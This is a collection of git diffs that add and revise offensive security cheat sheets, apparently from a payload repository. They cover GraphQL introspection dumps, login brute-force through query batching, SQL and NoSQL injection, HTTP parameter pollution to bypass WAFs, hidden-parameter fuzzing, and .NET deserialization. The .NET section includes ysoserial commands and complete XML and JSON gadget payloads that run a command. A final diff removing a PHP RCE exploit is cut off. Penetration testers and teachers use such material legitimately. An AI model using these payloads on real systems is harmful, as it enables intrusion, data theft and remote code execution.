 * [Introducing wrapwrap: using PHP filters to wrap a file with a prefix and suffix - Charles Fol - 11 December, 2023](https://www.ambionics.io/blog/wrapwrap-php-filters-suffix)
--- a/Toolkit/README.md
+++ b/Toolkit/README.md
@@ -0,0 +1,55 @@
 # Google Web Toolkit
 > Google Web Toolkit (GWT), also known as GWT Web Toolkit, is an open-source set of tools that allows web developers to create and maintain JavaScript front-end applications using Java. It was originally developed by Google and had its initial release on May 16, 2006.
 ## Summary
 * [Tools](#tools)
 * [Enumerate](#enumerate)
 * [References](#references)
 ## Tools
 * [FSecureLABS/GWTMap](https://github.com/FSecureLABS/GWTMap)
 * [GDSSecurity/GWT-Penetration-Testing-Toolset](https://github.com/GDSSecurity/GWT-Penetration-Testing-Toolset)
 ## Enumerate
 * Enumerate the methods of a remote application via it's bootstrap file and create a local backup of the code (selects permutation at random):
    ```ps1
    ./gwtmap.py -u http://10.10.10.10/olympian/olympian.nocache.js --backup
    ```
 * Enumerate the methods of a remote application via a specific code permutation
    ```ps1
    ./gwtmap.py -u http://10.10.10.10/olympian/C39AB19B83398A76A21E0CD04EC9B14C.cache.js
    ```
 * Enumerate the methods whilst routing traffic through an HTTP proxy:
    ```ps1
    ./gwtmap.py -u http://10.10.10.10/olympian/olympian.nocache.js --backup -p http://127.0.0.1:8080
    ```
 * Enumerate the methods of a local copy (a file) of any given permutation:
    ```ps1
    ./gwtmap.py -F test_data/olympian/C39AB19B83398A76A21E0CD04EC9B14C.cache.js
    ```
 * Filter output to a specific service or method: 
    ```ps1
    ./gwtmap.py -u http://10.10.10.10/olympian/olympian.nocache.js --filter AuthenticationService.login
    ```
 * Generate RPC payloads for all methods of the filtered service, with coloured output
    ```ps1
    ./gwtmap.py -u http://10.10.10.10/olympian/olympian.nocache.js --filter AuthenticationService --rpc --color
    ```
 * Automatically test (probe) the generate RPC request for the filtered service method
    ```ps1
    ./gwtmap.py -u http://10.10.10.10/olympian/olympian.nocache.js --filter AuthenticationService.login --rpc --probe
    ./gwtmap.py -u http://10.10.10.10/olympian/olympian.nocache.js --filter TestService.testDetails --rpc --probe
    ```
 ## References
 * [From Serialized to Shell :: Exploiting Google Web Toolkit with EL Injection - May 22, 2017](https://srcincite.io/blog/2017/05/22/from-serialized-to-shell-auditing-google-web-toolkit-with-el-injection.html)
 * [Hacking a Google Web Toolkit application - April 22, 2021 - thehackerish](https://thehackerish.com/hacking-a-google-web-toolkit-application/)
--- a/Injection/README.md
+++ b/Injection/README.md
@@ -1,33 +1,69 @@
-# GraphQL injection
+# GraphQL Injection
 > GraphQL is a query language for APIs and a runtime for fulfilling those queries with existing data. A GraphQL service is created by defining types and fields on those types, then providing functions for each field on each type
 ## Summary
-* [Tools](#tools)
+- [GraphQL injection](#graphql-injection)
-* [Exploit](#exploit)
+  - [Summary](#summary)
-  * [Identify an injection point](#identify-an-injection-point)
+  - [Tools](#tools)
-  * [Enumerate Database Schema via Instropection](#enumerate-database-schema-via-introspection)
+  - [Enumeration](#enumeration)
-  * [Extract data](#extract-data)
+    - [Common GraphQL endpoints](#common-graphql-endpoints)
-  * [Enumerate the types' definition](#enumerate-the-type-definition)
+    - [Identify an injection point](#identify-an-injection-point)
-  * [Use mutations](#use-mutations)
+    - [Enumerate Database Schema via Introspection](#enumerate-database-schema-via-introspection)
-  * [NOSQL injection](#nosql-injection)
+    - [Enumerate Database Schema via Suggestions](#enumerate-database-schema-via-suggestions)
-  * [SQL injection](#sql-injection)
+    - [Enumerate the types' definition](#enumerate-the-types-definition)
-* [References](#references)
+    - [List path to reach a type](#list-path-to-reach-a-type)
  - [Exploit](#exploit)
    - [Extract data](#extract-data)
    - [Extract data using edges/nodes](#extract-data-using-edgesnodes)
    - [Extract data using projections](#extract-data-using-projections)
    - [Use mutations](#use-mutations)
    - [GraphQL Batching Attacks](#graphql-batching-attacks)
      - [JSON list based batching](#json-list-based-batching)
      - [Query name based batching](#query-name-based-batching)
  - [Injections](#injections)
    - [NOSQL injection](#nosql-injection)
    - [SQL injection](#sql-injection)
  - [References](#references)
 ## Tools
-* [GraphQLmap - Scripting engine to interact with a graphql endpoint for pentesting purposes](https://github.com/swisskyrepo/GraphQLmap)
+* [swisskyrepo/GraphQLmap](https://github.com/swisskyrepo/GraphQLmap) - Scripting engine to interact with a graphql endpoint for pentesting purposes
-* [GraphQL Security Toolkit - GraphQL Security Research Material](https://github.com/doyensec/graph-ql/)
+* [doyensec/graph-ql](https://github.com/doyensec/graph-ql/) - GraphQL Security Research Material
-* [GraphQL IDE - An extensive IDE for exploring GraphQL API's](https://github.com/andev-software/graphql-ide)
+* [doyensec/inql](https://github.com/doyensec/inql) - A Burp Extension for GraphQL Security Testing
 * [doyensec/GQLSpection](https://github.com/doyensec/GQLSpection) - GQLSpection - parses GraphQL introspection schema and generates possible queries
 * [dee-see/graphql-path-enum](https://gitlab.com/dee-see/graphql-path-enum) - Lists the different ways of reaching a given type in a GraphQL schema
 * [andev-software/graphql-ide](https://github.com/andev-software/graphql-ide) - An extensive IDE for exploring GraphQL API's
 * [mchoji/clairvoyancex](https://github.com/mchoji/clairvoyancex) - Obtain GraphQL API schema despite disabled introspection
 * [nicholasaleks/CrackQL](https://github.com/nicholasaleks/CrackQL) - A GraphQL password brute-force and fuzzing utility
 * [nicholasaleks/graphql-threat-matrix](https://github.com/nicholasaleks/graphql-threat-matrix) - GraphQL threat framework used by security professionals to research security gaps in GraphQL implementations
 * [dolevf/graphql-cop](https://github.com/dolevf/graphql-cop) - Security Auditor Utility for GraphQL APIs
 * [IvanGoncharov/graphql-voyager](https://github.com/IvanGoncharov/graphql-voyager) - Represent any GraphQL API as an interactive graph
 * [Insomnia](https://insomnia.rest/) - Cross-platform HTTP and GraphQL Client
 ## Enumeration
 ### Common GraphQL endpoints
 Most of the time the graphql is located on the `/graphql` or `/graphiql` endpoint. 
 A more complete list is available at [danielmiessler/SecLists/graphql.txt](https://github.com/danielmiessler/SecLists/blob/fe2aa9e7b04b98d94432320d09b5987f39a17de8/Discovery/Web-Content/graphql.txt).
 ```ps1
 /v1/explorer
 /v1/graphiql
 /graph
 /graphql
 /graphql/console/
 /graphql.php
 /graphiql
 /graphiql.php
 ```
 ## Exploit
 ### Identify an injection point
 Most of the time the graphql is located on the `/graphql` or `/graphiql` endpoint.
 ```js
 example.com/graphql?query={__schema{types{name}}}
 example.com/graphiql?query={__schema{types{name}}}
@@ -149,14 +185,29 @@ query IntrospectionQuery {
 }
 ```
-
+Single line queries to dump the database schema without fragments.
 ### Extract data
 ```js
-example.com/graphql?query={TYPE_1{FIELD_1,FIELD_2}}
+__schema{queryType{name},mutationType{name},types{kind,name,description,fields(includeDeprecated:true){name,description,args{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue},type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},isDeprecated,deprecationReason},inputFields{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue},interfaces{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},enumValues(includeDeprecated:true){name,description,isDeprecated,deprecationReason,},possibleTypes{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}}},directives{name,description,locations,args{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue}}}
 ```
-![HTB Help - GraphQL injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/GraphQL%20Injection/Images/htb-help.png?raw=true)
+```js
 {__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}
 ```
 ### Enumerate Database Schema via Suggestions
 When you use an unknown keyword, the GraphQL backend will respond with a suggestion related to its schema.
 ```json
 {
  "message": "Cannot query field \"one\" on type \"Query\". Did you mean \"node\"?",
 }
 ```
 You can also try to bruteforce known keywords, field and type names using wordlists such as [Escape-Technologies/graphql-wordlist](https://github.com/Escape-Technologies/graphql-wordlist) when the schema of a GraphQL API is not accessible.
 ### Enumerate the types' definition 
@@ -167,6 +218,68 @@ Enumerate the definition of interesting types using the following GraphQL query,
 {__type (name: "User") {name fields{name type{name kind ofType{name kind}}}}}
 ```
 ### List path to reach a type
 ```php
 $ git clone https://gitlab.com/dee-see/graphql-path-enum
 $ graphql-path-enum -i ./test_data/h1_introspection.json -t Skill
 Found 27 ways to reach the "Skill" node from the "Query" node:
 - Query (assignable_teams) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
 - Query (checklist_check) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
 - Query (checklist_check_response) -> ChecklistCheckResponse (checklist_check) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
 - Query (checklist_checks) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
 - Query (clusters) -> Cluster (weaknesses) -> Weakness (critical_reports) -> TeamMemberGroupConnection (edges) -> TeamMemberGroupEdge (node) -> TeamMemberGroup (team_members) -> TeamMember (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
 - Query (embedded_submission_form) -> EmbeddedSubmissionForm (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
 - Query (external_program) -> ExternalProgram (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
 - Query (external_programs) -> ExternalProgram (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
 - Query (job_listing) -> JobListing (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
 - Query (job_listings) -> JobListing (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
 - Query (me) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
 - Query (pentest) -> Pentest (lead_pentester) -> Pentester (user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
 - Query (pentests) -> Pentest (lead_pentester) -> Pentester (user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
 - Query (query) -> Query (assignable_teams) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
 - Query (query) -> Query (skills) -> Skill
 ```
 ## Exploit
 ### Extract data
 ```js
 example.com/graphql?query={TYPE_1{FIELD_1,FIELD_2}}
 ```
 ![HTB Help - GraphQL injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/GraphQL%20Injection/Images/htb-help.png?raw=true)
 ### Extract data using edges/nodes
 ```json
 {
  "query": "query {
    teams{
      total_count,edges{
        node{
          id,_id,about,handle,state
        }
      }
    }
  }"
 } 
 ```
 ### Extract data using projections
 :warning: Don’t forget to escape the " inside the **options**.
 ```js
 {doctors(options: "{\"patients.ssn\" :1}"){firstName lastName id patients{ssn}}}
 ```
 ### Use mutations
 Mutations work like function, you can use them to interact with the GraphQL.
@@ -176,11 +289,69 @@ Mutations work like function, you can use them to interact with the GraphQL.
 # mutation{addUser(id:"1", name:"Dan Abramov", email:"dan@dan.com") {id name email}}
 ```
 ### GraphQL Batching Attacks
 Common scenario:
 * Password Brute-force Amplification Scenario
 * Rate Limit bypass
 * 2FA bypassing
 #### JSON list based batching
 > Query batching is a feature of GraphQL that allows multiple queries to be sent to the server in a single HTTP request. Instead of sending each query in a separate request, the client can send an array of queries in a single POST request to the GraphQL server. This reduces the number of HTTP requests and can improve the performance of the application.
 Query batching works by defining an array of operations in the request body. Each operation can have its own query, variables, and operation name. The server processes each operation in the array and returns an array of responses, one for each query in the batch.
 ```json
 [
    {
        "query":"..."
    },{
        "query":"..."
    }
    ,{
        "query":"..."
    }
    ,{
        "query":"..."
    }
    ...
 ]
 ```
 #### Query name based batching
 ```json
 {
    "query": "query { qname: Query { field1 } qname1: Query { field1 } }"
 }
 ```
 Send the same mutation several times using aliases
 ```js
 mutation {
  login(pass: 1111, username: "bob")
  second: login(pass: 2222, username: "bob")
  third: login(pass: 3333, username: "bob")
  fourth: login(pass: 4444, username: "bob")
 }
 ```
 ## Injections
 > SQL and NoSQL Injections are still possible since GraphQL is just a layer between the client and the database.
 ### NOSQL injection
 Use `$regex`, `$ne` from []() inside a `search` parameter.
-```json
+```js
 {
  doctors(
    options: "{\"limit\": 1, \"patients.ssn\" :1}", 
@@ -194,6 +365,18 @@ Use `$regex`, `$ne` from []() inside a `search` parameter.
 ### SQL injection
 Send a single quote `'` inside a graphql parameter to trigger the SQL injection
 ```js
 { 
    bacon(id: "1'") { 
        id, 
        type, 
        price
    }
 }
 ```
 Simple SQL injection inside a graphql field.
 ```powershell
@@ -214,4 +397,10 @@ curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27%
 * [Looting GraphQL Endpoints for Fun and Profit - @theRaz0r](https://raz0r.name/articles/looting-graphql-endpoints-for-fun-and-profit/)
 * [How to set up a GraphQL Server using Node.js, Express & MongoDB - 5 NOVEMBER 2018 - Leonardo Maldonado](https://www.freecodecamp.org/news/how-to-set-up-a-graphql-server-using-node-js-express-mongodb-52421b73f474/)
 * [GraphQL cheatsheet - DEVHINTS.IO](https://devhints.io/graphql)
-* [HIP19 Writeup - Meet Your Doctor 1,2,3 - June 22, 2019 - Swissky](https://swisskyrepo.github.io/HIP19-MeetYourDoctor/)
+* [HIP19 Writeup - Meet Your Doctor 1,2,3 - June 22, 2019 - Swissky](https://swisskyrepo.github.io/HIP19-MeetYourDoctor/)
 * [Introspection query leaks sensitive graphql system information - @Zuriel](https://hackerone.com/reports/291531)
 * [Graphql Bug to Steal Anyone’s Address - Sept 1, 2019 - Pratik Yadav](https://medium.com/@pratiky054/graphql-bug-to-steal-anyones-address-fc34f0374417)
 * [GraphQL Batching Attack - RENATAWALLARM - DECEMBER 13, 2019](https://lab.wallarm.com/graphql-batching-attack/)
 * [GraphQL for Pentesters presentation by ACCEIS - 01/12/2022](https://acceis.github.io/prez-graphql/) - [source](https://github.com/Acceis/prez-graphql)
 * [Exploiting GraphQL - Aug 29, 2021 - AssetNote - Shubham Shah](https://blog.assetnote.io/2021/08/29/exploiting-graphql/)
 * [Building a free open source GraphQL wordlist for penetration testing - Nohé Hinniger-Foray - Aug 17, 2023](https://escape.tech/blog/graphql-security-wordlist/)
--- a/Pollution/README.md
+++ b/Pollution/README.md
@@ -0,0 +1,58 @@
 # HTTP Parameter Pollution
 > HTTP Parameter Pollution (HPP) is a Web attack evasion technique that allows an attacker to craft a HTTP request in order to manipulate web logics or retrieve hidden information. This evasion technique is based on splitting an attack vector between multiple instances of a parameter with the same name (?param1=value&param1=value). As there is no formal way of parsing HTTP parameters, individual web technologies have their own unique way of parsing and reading URL parameters with the same name. Some taking the first occurrence, some taking the last occurrence, and some reading it as an array. This behavior is abused by the attacker in order to bypass pattern-based security mechanisms. 
 ## Summary
 * [Tools](#tools)
 * [How to test](#how-to-test)
    * [Table of reference](#table-of-reference)
 * [References](#references)
 ## Tools
 No tools needed. Maybe Burp or OWASP ZAP.
 ## How to test
 HPP allows an attacker to bypass pattern based/black list proxies or Web Application Firewall detection mechanisms. This can be done with or without the knowledge of the web technology behind the proxy, and can be achieved through simple trial and error. 
 ```
 Example scenario.
 WAF - Reads first param
 Origin Service - Reads second param. In this scenario, developer trusted WAF and did not implement sanity checks.
 Attacker -- http://example.com?search=Beth&search=' OR 1=1;## --> WAF (reads first 'search' param, looks innocent. passes on) --> Origin Service (reads second 'search' param, injection happens if no checks are done here.)
 ```
 ### Table of reference
 When ?par1=a&par1=b
 | Technology                                      | Parsing Result          |outcome (par1=)|
 | ------------------                              |---------------          |:-------------:|
 | ASP.NET/IIS                                     |All occurrences          |a,b            |
 | ASP/IIS                                         |All occurrences          |a,b            |
 | PHP/Apache                                      |Last occurrence          |b              |
 | PHP/Zues                                        |Last occurrence          |b              |
 | JSP,Servlet/Tomcat                              |First occurrence         |a              |
 | Perl CGI/Apache                                 |First occurrence         |a              |
 | Python Flask                                    |First occurrence         |a              |
 | Python Django                                   |Last occurrence          |b              |
 | Nodejs                                          |All occurrences          |a,b            |
 | Golang net/http - `r.URL.Query().Get("param")`  |First occurrence         |a              |
 | Golang net/http - `r.URL.Query()["param"]`      |All occurrences in array |['a','b']      |
 | IBM Lotus Domino                                |First occurrence         |a              |
 | IBM HTTP Server                                 |First occurrence         |a              |
 | Perl CGI/Apache                                 |First occurrence         |a              |
 | mod_wsgi (Python)/Apache                        |First occurrence         |a              |
 | Python/Zope                                     |All occurrences in array |['a','b']      |
 | Ruby on Rails                                   |Last occurrence          |b              |
 ## References
 - [HTTP Parameter Pollution - Imperva](https://www.imperva.com/learn/application-security/http-parameter-pollution/)
 - [HTTP Parameter Pollution in 11 minutes | Web Hacking - PwnFunction](https://www.youtube.com/watch?v=QVZBl8yxVX0&ab_channel=PwnFunction)
 - [How to Detect HTTP Parameter Pollution Attacks - Acunetix](https://www.acunetix.com/blog/whitepaper-http-parameter-pollution/)
--- a/Parameters/README.md
+++ b/Parameters/README.md
@@ -0,0 +1,51 @@
 # HTTP Hidden Parameters
 > Web applications often have hidden or undocumented parameters that are not exposed in the user interface. Fuzzing can help discover these parameters, which might be vulnerable to various attacks.
 ## Summary
 * [Tools](#tools)
 * [Exploit](#exploit)
    * [Bruteforce parameters](#bruteforce-parameters)
    * [Old parameters](#old-parameters)
 * [References](#references)
 ## Tools
 * [PortSwigger/param-miner](https://github.com/PortSwigger/param-miner) - Burp extension to identify hidden, unlinked parameters.
 * [s0md3v/Arjun](https://github.com/s0md3v/Arjun) - HTTP parameter discovery suite
 * [Sh1Yo/x8](https://github.com/Sh1Yo/x8) - Hidden parameters discovery suite
 * [tomnomnom/waybackurls](https://github.com/tomnomnom/waybackurls) - Fetch all the URLs that the Wayback Machine knows about for a domain
 * [devanshbatham/ParamSpider](https://github.com/devanshbatham/ParamSpider) - Mining URLs from dark corners of Web Archives for bug hunting/fuzzing/further probing
 ## Exploit
 ### Bruteforce parameters
 * Use wordlists of common parameters and send them, look for unexpected behavior from the backend. 
    ```ps1
    x8 -u "https://example.com/" -w <wordlist>
    x8 -u "https://example.com/" -X POST -w <wordlist>
    ```
 Wordlist examples: 
 - [Arjun/large.txt](https://github.com/s0md3v/Arjun/blob/master/arjun/db/large.txt)
 - [Arjun/medium.txt](https://github.com/s0md3v/Arjun/blob/master/arjun/db/medium.txt)
 - [Arjun/small.txt](https://github.com/s0md3v/Arjun/blob/master/arjun/db/small.txt)
 - [samlists/sam-cc-parameters-lowercase-all.txt](https://github.com/the-xentropy/samlists/blob/main/sam-cc-parameters-lowercase-all.txt)
 - [samlists/sam-cc-parameters-mixedcase-all.txt](https://github.com/the-xentropy/samlists/blob/main/sam-cc-parameters-mixedcase-all.txt)
 ### Old parameters
 Explore all the URL from your targets to find old parameters.
 * Browse the [Wayback Machine](http://web.archive.org/)
 * Look through the JS files to discover unused parameters
 ## References
 * [Hacker tools: Arjun – The parameter discovery tool - 17TH MAY 2021 - Intigriti](https://blog.intigriti.com/2021/05/17/hacker-tools-arjun-the-parameter-discovery-tool/)
 * [Parameter Discovery: A quick guide to start - 20/04/2022 - YesWeHack](https://blog.yeswehack.com/yeswerhackers/parameter-discovery-quick-guide-to-start/)
--- a/Deserialization/DotNET.md
+++ b/Deserialization/DotNET.md
@@ -0,0 +1,174 @@
 # .NET Serialization
 ## Summary
 * [Detection](#detection)
 * [Tools](#tools)
 * [Formatters](#formatters)
    * [XmlSerializer](#xmlserializer)
    * [DataContractSerializer](#datacontractserializer)
    * [NetDataContractSerializer](#netdatacontractserializer)
    * [LosFormatter](#losformatter)
    * [JSON.NET](#jsonnet)
    * [BinaryFormatter](#binaryformatter)
 * [POP Gadgets](#pop-gadgets)
 * [References](#references)
 ## Detection
 * `AAEAAD` (Hex) = .NET deserialization BinaryFormatter
 * `FF01` (Hex) / `/w` (Base64) = .NET ViewState
 Example: `AAEAAAD/////AQAAAAAAAAAMAgAAAF9TeXN0ZW0u[...]0KPC9PYmpzPgs=`
 ## Tools
 * [pwntester/ysoserial.net - Deserialization payload generator for a variety of .NET formatters](https://github.com/pwntester/ysoserial.net)
 ```ps1
 $ cat my_long_cmd.txt | ysoserial.exe -o raw -g WindowsIdentity -f Json.Net -s
 $ ./ysoserial.exe -p DotNetNuke -m read_file -f win.ini
 $ ./ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc" -t
 $ ./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t
 ```
 ## Formatters
 ![NETNativeFormatters.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/Insecure%20Deserialization/Images/NETNativeFormatters.png?raw=true)    
 .NET Native Formatters from [pwntester/attacking-net-serialization](https://speakerdeck.com/pwntester/attacking-net-serialization?slide=15)
 ### XmlSerializer
 * In C# source code, look for `XmlSerializer(typeof(<TYPE>));`.
 * The attacker must control the **type** of the XmlSerializer.
 * Payload output: **XML**
 ```xml
 .\ysoserial.exe -g ObjectDataProvider -f XmlSerializer -c "calc.exe"
 <?xml version="1.0"?>
 <root type="System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089">
    <ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" >
        <ExpandedElement/>
        <ProjectedProperty0>
            <MethodName>Parse</MethodName>
            <MethodParameters>
                <anyType xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string">
                    <![CDATA[<ResourceDictionary xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:d="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:b="clr-namespace:System;assembly=mscorlib" xmlns:c="clr-namespace:System.Diagnostics;assembly=system"><ObjectDataProvider d:Key="" ObjectType="{d:Type c:Process}" MethodName="Start"><ObjectDataProvider.MethodParameters><b:String>cmd</b:String><b:String>/c calc.exe</b:String></ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]>
                </anyType>
            </MethodParameters>
            <ObjectInstance xsi:type="XamlReader"></ObjectInstance>
        </ProjectedProperty0>
    </ExpandedWrapperOfXamlReaderObjectDataProvider>
 </root>
 ```
 ### DataContractSerializer
 > The DataContractSerializer deserializes in a loosely coupled way. It never reads common language runtime (CLR) type and assembly names from the incoming data. The security model for the XmlSerializer is similar to that of the DataContractSerializer, and differs mostly in details. For example, the XmlIncludeAttribute attribute is used for type inclusion instead of the KnownTypeAttribute attribute.
 * In C# source code, look for `DataContractSerializer(typeof(<TYPE>))`.
 * Payload output: **XML**
 * Data **Type** must be user-controlled to be exploitable
 ### NetDataContractSerializer 
 > It extends the `System.Runtime.Serialization.XmlObjectSerializer` class and is capable of serializing any type annotated with serializable attribute as `BinaryFormatter`.
 * In C# source code, look for `NetDataContractSerializer().ReadObject()`.
 * Payload output: **XML**
 ```ps1
 .\ysoserial.exe -f NetDataContractSerializer -g TypeConfuseDelegate -c "calc.exe" -o base64 -t
 ```
 ### LosFormatter
 * Use `BinaryFormatter` internally.
 ```ps1
 .\ysoserial.exe -f LosFormatter -g TypeConfuseDelegate -c "calc.exe" -o base64 -t
 ```
 ### JSON.NET
 * In C# source code, look for `JsonConvert.DeserializeObject<Expected>(json, new JsonSerializerSettings`.
 * Payload output: **JSON**
 ```ps1
 .\ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc.exe" -t
 {
    '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 
    'MethodName':'Start',
    'MethodParameters':{
        '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
        '$values':['cmd', '/c calc.exe']
    },
    'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
 }
 ```
 ### BinaryFormatter
 > The BinaryFormatter type is dangerous and is not recommended for data processing. Applications should stop using BinaryFormatter as soon as possible, even if they believe the data they're processing to be trustworthy. BinaryFormatter is insecure and can’t be made secure.
 * In C# source code, look for `System.Runtime.Serialization.Binary.BinaryFormatter`.
 * Exploitation requires `[Serializable]` or `ISerializable` interface.
 * Payload output: **Binary**
 ```ps1
 ./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t
 ```
 ## POP Gadgets
 These gadgets must have the following properties:
 * Serializable
 * Public/settable variables
 * Magic "functions": Get/Set, OnSerialisation, Constructors/Destructors
 You must carefully select your **gadgets** for a targeted **formatter**.
 List of popular gadgets used in common payloads.
 * **ObjectDataProvider** from `C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll`
    * Use `MethodParameters` to set arbitrary parameters
    * Use `MethodName` to call an arbitrary function 
 * **ExpandedWrapper**
    * Specify the `object types` of the objects that are encapsulated
    ```cs
    ExpandedWrapper<Process, ObjectDataProvider> myExpWrap = new ExpandedWrapper<Process, ObjectDataProvider>();
    ```
 * **System.Configuration.Install.AssemblyInstaller**
    * Execute payload with Assembly.Load   
    ```cs
    // System.Configuration.Install.AssemblyInstaller
    public void set_Path(string value){
        if (value == null){
            this.assembly = null;
        }
        this.assembly = Assembly.LoadFrom(value);
    }
    ```
 ## References
 * [Attacking .NET Serialization - Alvaro - October 20, 2017](https://speakerdeck.com/pwntester/attacking-net-serialization?slide=11)
 * [Attacking .NET Deserialization - Alvaro Muñoz - 28 avr. 2018](https://youtu.be/eDfGpu3iE4Q)
 * [Friday the 13th: JSON Attacks - Alvaro Muñoz (@pwntester) Oleksandr Mirosh - Slides](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf)
 * [Friday the 13th: JSON Attacks - Alvaro Muñoz (@pwntester) Oleksandr Mirosh - White Paper](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf)
 * [Friday the 13th: JSON Attacks - Alvaro Muñoz (@pwntester) Oleksandr Mirosh - DEF CON 25 Conference](https://www.youtube.com/watch?v=ZBfBYoK_Wr0)
 * [ARE YOU MY TYPE? Breaking .NET sandboxes through Serialization - James Forshaw - Slides](https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_Slides.pdf)
 * [ARE YOU MY TYPE? Breaking .NET sandboxes through Serialization - James Forshaw - White Paper](https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf)
 * [Now You Serial, Now You Don't - Systematically Hunting for Deserialization Exploits - ALYSSA RAHMANDEC](https://www.mandiant.com/resources/blog/hunting-deserialization-exploits)
 * [Exploiting Deserialisation in ASP.NET via ViewState - Soroush Dalili (@irsdl) - 04/2019](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
 * [Bypassing .NET Serialization Binders - Markus Wulftange - June 28, 2022](https://codewhitesec.blogspot.com/2022/06/bypassing-dotnet-serialization-binders.html)
 * [Basic .Net deserialization (ObjectDataProvider gadget, ExpandedWrapper, and Json.Net) - hacktricks](https://book.hacktricks.xyz/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net)
 * [Sitecore Experience Platform Pre-Auth RCE - CVE-2021-42237 - Nov 2, 2021 - Shubham Shah](https://blog.assetnote.io/2021/11/02/sitecore-rce/)
 * [Finding a New DataContractSerializer RCE Gadget Chain - November 7, 2019 - dugisec](https://muffsec.com/blog/finding-a-new-datacontractserializer-rce-gadget-chain/)
--- a/Deserialization/Files/PHP-Serialization-RCE-Exploit.php
+++ b/Deserialization/Files/PHP-Serialization-RCE-Exploit.php
@@ -1,32 +0,0 @@
 <?php 
 /*
 PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://crowdshield.com
